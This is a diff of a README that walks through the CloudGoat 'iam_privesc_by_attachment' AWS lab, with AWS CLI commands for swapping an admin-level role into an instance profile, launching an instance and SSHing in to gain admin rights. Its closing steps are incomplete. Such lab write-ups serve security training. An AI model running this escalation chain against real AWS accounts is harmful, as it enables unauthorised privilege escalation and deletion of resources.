metalmandalore/cloud-goat_walkthrough/README.md

 Then `:wq` to write and quit

 ## iam_privesc_by_attachment
+**Scenario Goal: Delete the EC2 instance "cg-super-critical-security-server."**
 1. Create scenario
 `./cloudgoat.py create iam_privesc_by_attachment --profile goat`
+2. Document all Outputs information
+3. Create user profile
+`aws configure --profile kerrigan`
+    * AWS Access Key ID: __kerrigan account aws_access_key_id__
+    * AWS Secret Access Key: __kerrigan aws_secret_access_key__
+    * Default region name: __us-east-1__
+    * Default output format: __leave blank__
+4. View the EC2 instances
+`aws ec2 describe-instances --profile kerrigan`
+5. Document the information concerning the image with the Tag containing "super-critical-security-server EC2 Instance" There's only one instance listed, so this is simple
+6. Attempt to stop-instances or terminate-instances `aws ec2 stop-instances --instance-ids <instanceID> --region us-east-1 --profile kerrigan`
+`aws ec2 terminate-instances --instance-ids <instanceID> --region us-east-1 --profile kerrigan`
+Since this isn't authorized with this profile an alternate route must be explored
+7. Enumerate instance profiles
+`aws iam list-instance-profiles --profile kerrigan`
+Two of these instance profiles appear to contain AWS access key IDs different than kerrigan's
+8. Enumerate roles
+`aws iam list-roles --profile kerrigan`
+Most of the roles listed grant access to services other than EC2 (RDS, trustedAdvisor, support, etc).
+Look at the profiles and comparing them to the roles.
+There is a meek profile and role, but no mighty role.
+Let's fix that!
+9. Remove the meek role from the meek profile
+`aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-x --role-name cg-ec2-meek-role-x --profile kerrigan`
+10. Add the mighty role to the meek profile
+`aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-x --role-name cg-ec2-mighty-role-x --profile kerrigan`
+This change elevates privileges, but not enough to terminate the target.
+However, now we can deploy our own instance.
+1st lets find more information about our target.
+Then we'll create a new EC2 pair to create the instance with and grant us shell access to the new image.
+11. What subnet is the target connected to?
+`aws ec2 describe-subnets --subnet-id <targetSubnetID> --profile kerrigan`
+It's tagged as public subnet, that's convenient.
+12. What Security Groups are associated with the target?
+Further inspection if the Group Names are to be believed, one is for http, and the other is for ssh access
+13. Create new EC2 key pair and save it as a .pem file for ssh use
+`aws ec2 create-key-pair --key-name mighty --query 'KeyMaterial' --output text | out-file -encoding ascii -filepath mighty.pem --profile kerrigan`
+`chmod 400 mighty.pem`
+14. Create a new EC2 instance with the new keypair, and the subnet/security group IDs that are the same as the target instance
+`aws ec2 run-instances --image-id <targetImageID> --instance-type t2.micro --iam-instance-profile Arn=<meekInstanceProfileARN> --key-name mighty --profile kerrigan --subnet-id <subnetID> --security-group-ids <securityGroupID>`
+15. Copy the new Instance ID and find it's public IP address `aws ec2 describe-instances --instance-id <newInstanceID> --profile kerrigan`
+16. SSH into the newly created instance
+`ssh -i mighty.pem ubuntu@<publicDNSnameValue>`
+17.
+Attach full admin instance profile to EC2 instance
+1. Access new EC2 instance and execute aws cli commands with full admin privileges 15.

+### Remove iam_privesc_by_attachment
+1. Delete all created resources as these will not be removed with CloudGoat's Destroy script

+2. Remove the

 ## cloud_breach_s3
 1. Create scenario